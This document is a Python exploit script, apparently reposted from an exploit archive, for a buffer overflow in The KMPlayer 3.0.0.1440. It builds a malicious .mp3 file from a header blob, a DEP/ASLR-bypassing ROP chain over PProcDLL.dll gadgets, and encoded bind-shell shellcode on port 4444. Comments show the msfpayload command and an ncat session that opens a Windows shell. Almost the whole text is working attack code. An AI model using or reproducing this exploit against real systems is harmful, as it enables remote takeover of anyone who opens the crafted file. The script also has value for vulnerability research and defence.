ExploitFixes
The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit (Win7 + ASLR bypass mod) 2011-06-11 13:15:10

#!/usr/bin/python
# Exploit Title: The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit (Win7 + ASLR bypass)
# Date: Jun 10th, 2011
# Author(s):
# dookie and ronin (initial XPSP3 DEP bypass PoC)
# xsploitedsec <xsploitedsecurity[at]gmail[dot]com> (Win7 + ASLR mod)
# Software Link: http://download.cnet.com/The-KMPlayer/3000-13632_4-10659939.html
# Tested On: Windows7 x64 Ultimate SP1 Eng
#
# References:
# http://www.exploit-db.com/exploits/17364/
# https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
# Video of this PoC in action: http://www.youtube.com/watch?v=jAHJveGiCfI
#
# Shouts/Thanks: edb-team, corelanc0d3r/corelan team, dookie2000ca, kAoTiX, deca, MaX
# "When the going gets tough, the tough get going."
# Have fun!

import os

evilfile = "km_pwn_aslr.mp3"

head = "\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13"
"\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70"
"\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65"
"\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3"
"\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34"
"\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E"
"\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65"
"\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45"
"\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54"
"\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C"
"\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61"
"\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27"
"\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0"
"\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0"
"\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F"
"\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00"
"\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44"
"\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52"
"\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C"
"\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D"
"\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D"
"\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC"
"\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42"
"\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x00"
"\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49"
"\x64\x65\x6E\x74\x69\x66\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B"
"\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00"
"\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F"
"\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C"
"\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F"
"\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00"
"\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00"
"\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D"
"\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75"
"\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC"
"\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49"
"\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20"
"\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00"
"\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93"
"\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00"
"\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00"
"\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00"
"\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00"
"\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00"
"\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00"
"\x00\x00"

#[email protected] ~ $ msfpayload windows/shell_bind_tcp LPORT=4444 R|msfencode -b '\x00\x0a\x0d' -t c
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
#
#[email protected] ~ $ ncat 10.0.1.7 4444
#Microsoft Windows [Version 6.1.7601]
#Copyright (c) 2009 Microsoft Corporation. All rights reserved.
#
#C:\Program Files (x86)\The KMPlayer>

shellcode = (
"\xb8\x72\x95\x89\x50\xdd\xc1\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x56\x31\x43\x13\x83\xc3\x04\x03\x43\x7d\x77\x7c\xac\x69\xfe"
"\x7f\x4d\x69\x61\x09\xa8\x58\xb3\x6d\xb8\xc8\x03\xe5\xec\xe0"
"\xe8\xab\x04\x73\x9c\x63\x2a\x34\x2b\x52\x05\xc5\x9d\x5a\xc9"
"\x05\xbf\x26\x10\x59\x1f\x16\xdb\xac\x5e\x5f\x06\x5e\x32\x08"
"\x4c\xcc\xa3\x3d\x10\xcc\xc2\x91\x1e\x6c\xbd\x94\xe1\x18\x77"
"\x96\x31\xb0\x0c\xd0\xa9\xbb\x4b\xc1\xc8\x68\x88\x3d\x82\x05"
"\x7b\xb5\x15\xcf\xb5\x36\x24\x2f\x19\x09\x88\xa2\x63\x4d\x2f"
"\x5c\x16\xa5\x53\xe1\x21\x7e\x29\x3d\xa7\x63\x89\xb6\x1f\x40"
"\x2b\x1b\xf9\x03\x27\xd0\x8d\x4c\x24\xe7\x42\xe7\x50\x6c\x65"
"\x28\xd1\x36\x42\xec\xb9\xed\xeb\xb5\x67\x40\x13\xa5\xc0\x3d"
"\xb1\xad\xe3\x2a\xc3\xef\x6b\x9f\xfe\x0f\x6c\xb7\x89\x7c\x5e"
"\x18\x22\xeb\xd2\xd1\xec\xec\x15\xc8\x49\x62\xe8\xf2\xa9\xaa"
"\x2f\xa6\xf9\xc4\x86\xc6\x91\x14\x26\x13\x35\x45\x88\xcb\xf6"
"\x35\x68\xbb\x9e\x5f\x67\xe4\xbf\x5f\xad\x93\x87\x91\x95\xf0"
"\x6f\xd0\x29\xe7\x33\x5d\xcf\x6d\xdc\x0b\x47\x19\x1e\x68\x50"
"\xbe\x61\x5a\xcc\x17\xf6\xd2\x1a\xaf\xf9\xe2\x08\x9c\x56\x4a"
"\xdb\x56\xb5\x4f\xfa\x69\x90\xe7\x75\x52\x73\x7d\xe8\x11\xe5"
"\x82\x21\xc1\x86\x11\xae\x11\xc0\x09\x79\x46\x85\xfc\x70\x02"
"\x3b\xa6\x2a\x30\xc6\x3e\x14\xf0\x1d\x83\x9b\xf9\xd0\xbf\xbf"
"\xe9\x2c\x3f\x84\x5d\xe1\x16\x52\x0b\x47\xc1\x14\xe5\x11\xbe"
"\xfe\x61\xe7\x8c\xc0\xf7\xe8\xd8\xb6\x17\x58\xb5\x8e\x28\x55"
"\x51\x07\x51\x8b\xc1\xe8\x88\x0f\xf1\xa2\x90\x26\x9a\x6a\x41"
"\x7b\xc7\x8c\xbc\xb8\xfe\x0e\x34\x41\x05\x0e\x3d\x44\x41\x88"
"\xae\x34\xda\x7d\xd0\xeb\xdb\x57"
)

# A few notes:
# All DEP/ASLR bypass ROP code is from PProcDLL.dll (and assumes no ASLR on this module).
# 1.
# Calls to VirtualProtect (from pprocdll.dll) are found at:
# 0x1014717B : CALL DWORD PTR DS:[<&KERNEL32.VirtualProtect>]
# 0x101471F4 : CALL DWORD PTR DS:[<&KERNEL32.VirtualProtect>]
# 2.
# A kernel32 pointer is already sitting in ECX after the crash (on my test PC).
#
# For the sake of challenge and learning. I use ROP/static offsets to dynamically retrieve a kernel32 pointer
# from the stack/get it into a register. I then increase this value until it points at &Kernel32.VirtualProtect().
# The rest is just basic ROP/DEP (using the VirtualProtect() method).

eip_offset = 4095
#kernel32 ptr offset = initial ESP-288
#virtualprotect ptr offset = kernel32 ptr + 1075

junk = "\x41" * eip_offset

rop_align = "\x41\x41\x41\x41"

################################# Begin ROP chain #################################

########## Redirect execution back to stack ##########
rop = "\x17\xBF\x0E\x10" #0x100EBF17 : # ADD ESP,20 # RETN 4
rop += rop_align * 9
########## Place stack pointer in EAX ##########
rop += "\x7F\xCB\x0F\x10" #0x100FCB7F : # PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,2C # RETN
rop += rop_align * 15
rop += "\xC8\x1B\x12\x10" #0x10121BC8 : # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
########## Jump over VirtualProtect() params ##########
rop += "\x56\x75\x13\x10" #0x10137556 : # ADD ESP,20 # RETN
########## VirtualProtect call placeholder ##########
rop += "\x42\x45\x45\x46" #&Kernel32.VirtualProtect() placeholder - "BEEF"
rop += "WWWW" #Return address param placeholder
rop += "XXXX" #lpAddress param placeholder
rop += "YYYY" #Size param placeholder
rop += "ZZZZ" #flNewProtect param placeholder
rop += "\x60\xFC\x18\x10" #lpflOldProtect param placeholder (Writeable Address) - 0x1018FC60 {PAGE_WRITECOPY}
rop += rop_align * 2
########## Grab kernel32 pointer from the stack, place it in EAX ##########
rop += "\x5D\x1C\x12\x10" * 6 #0x10121C5D : # SUB EAX,30 # RETN
rop += "\xF6\xBC\x11\x10" #0x1011BCF6 : # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # RETN
rop += rop_align
########## EAX = kernel pointer, now retrieve pointer to VirtualProtect() ##########
rop += ("\x76\xE5\x12\x10" + rop_align) * 4 #0x1012E576 : # ADD EAX,100 # POP EBP # RETN
rop += "\x40\xD6\x12\x10" #0x1012D640 : # ADD EAX,20 # RETN
rop += "\xB1\xB6\x11\x10" #0x1011B6B1 : # ADD EAX,0C # RETN
rop += "\xD0\x64\x03\x10" #0x100364D0 : # ADD EAX,8 # RETN
rop += "\x33\x29\x0E\x10" #0x100E2933 : # DEC EAX # RETN
rop += "\x01\x2B\x0D\x10" #0x100D2B01 : # MOV ECX,EAX # RETN
rop += "\xC8\x1B\x12\x10" #0x10121BC8 : # MOV EAX,EDI # POP ESI # RETN
########## At this point, ECX = &kernel32.VirtualProtect, EDI/EAX = initial stack pointer ##########

########## Make EAX point to address of VirtualProtect() placeholder ##########
rop += "\xB1\xB6\x11\x10" * 5 #0x1011B6B1 : # ADD EAX,0C # RETN
rop += "\xD0\x64\x03\x10" * 2 #0x100364D0 : # ADD EAX,8 # RETN
rop += "\xD5\xCE\x11\x10" * 4 #0x1011CED5 : # INC EAX # RETN
########## Write VirtualProtect pointer to stack ##########
rop += "\x41\x2F\x11\x10" #0x10112F41 : # MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
rop += rop_align
########## Make ECX point to address of nops / shellcode ##########
rop += "\xC8\x1B\x12\x10" #0x10121BC8 : # MOV EAX,EDI # POP ESI # RETN
rop += rop_align * 2
rop += ("\x76\xE5\x12\x10" + rop_align) * 3 #0x1012E576 : # ADD EAX,100 # POP EBP # RETN
rop += "\x01\x2B\x0D\x10" #0x100D2B01 : # MOV ECX,EAX # RETN
########## Make EAX point to return address placeholder ##########
rop += "\xC8\x1B\x12\x10" #0x10121BC8 : # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
rop += "\xB1\xB6\x11\x10" * 6 #0x1011B6B1 : # ADD EAX,0C # RETN
########## Write return address to stack ##########
rop += "\x41\x2F\x11\x10" #0x10112F41 : # MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
rop += rop_align
########## Make EAX point to lpAddress placeholder ##########
rop += "\xC8\x1B\x12\x10" #0x10121BC8 : # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
rop += "\xB1\xB6\x11\x10" * 7 #0x1011B6B1 : # ADD EAX,0C # RETN
rop += "\xD5\xCE\x11\x10" * 4 #0x1011CED5 : # INC EAX # RETN
########## Write lpAddress to stack ##########
rop += "\x41\x2F\x11\x10" #0x10112F41 : # MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
rop += rop_align
########## Save address of VirtualProtect call placeholder to EBX (for later) ##########
rop += "\x77\x78\x12\x10" #0x10127877 : # SUB EAX,7 # POP ESI # RETN
rop += rop_align * 2
rop += "\x33\x29\x0E\x10" #0x100E2933 : # DEC EAX # RETN
rop += "\x81\x96\x03\x10" #0x10039681 : # XCHG EAX,EBX # ADD AL,10 # RETN [Module : PProcDLL.dll] **
########## Make EAX point to Size param placeholder ##########
rop += "\xC8\x1B\x12\x10" #0x10121BC8 : # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
rop += "\xB1\xB6\x11\x10" * 6 #0x1011B6B1 : # ADD EAX,0C # RETN
rop += "\xD0\x64\x03\x10" #0x100364D0 : # ADD EAX,8 # RETN
########## Craft Size parameter into EAX (Adjust to needed/desired size) ##########
rop += "\x01\x2B\x0D\x10" #0x100D2B01 : # MOV ECX,EAX # RETN
rop += "\x2C\x2A\x0D\x10" #0x100D2A2C : # XOR EAX,EAX # RETN
rop += ("\x76\xE5\x12\x10" + rop_align) * 10 #0x1012E576 : # ADD EAX,100 # POP EBP # RETN
########## Write Size param to stack ##########
rop += "\x60\x83\x02\x10" #0x10028360 : # MOV DWORD PTR DS:[ECX],EAX # RETN
########## Make EAX point to address of flNewProtect placeholder ##########
rop += "\xD2\x9F\x10\x10" #0x10109FD2 : # MOV EAX,ECX # RETN
rop += "\xD0\x64\x03\x10" #0x100364D0 : # ADD EAX,8 # RETN
rop += "\x33\x29\x0E\x10" * 4 #0x100E2933 : # DEC EAX # RETN
rop += "\x01\x2B\x0D\x10" #0x100D2B01 : # MOV ECX,EAX # RETN
########## Put flNewProtect param (0x00000040) in EAX ##########
rop += "\x2C\x2A\x0D\x10" #0x100D2A2C : # XOR EAX,EAX # RETN
rop += "\x68\xE5\x12\x10" #0x1012E568 : # ADD EAX,40 # POP EBP # RETN
rop += rop_align
########## Write flNewProtect param to stack ##########
rop += "\x60\x83\x02\x10" #0x10028360 : # MOV DWORD PTR DS:[ECX],EAX # RETN

########## Everything is ready to go, Get EBX back into ESP and RETN ##########
rop += "\xD8\xA3\x10\x10" #0x10039681 : # XCHG EAX,EBX # ADD AL,10 # RETN
rop += rop_align
rop += "\x99\x09\x11\x10" #0x10110999 : # XCHG EAX,ESP # RETN
################################# End ROP chain #################################

nops = "\x90" * 300
padding = "D" * (7000 - len(head + junk + rop + nops + shellcode))

sploit = (head + junk + rop + nops + shellcode + padding)

crashy = open(evilfile,"w")
crashy.write(sploit)
crashy.close()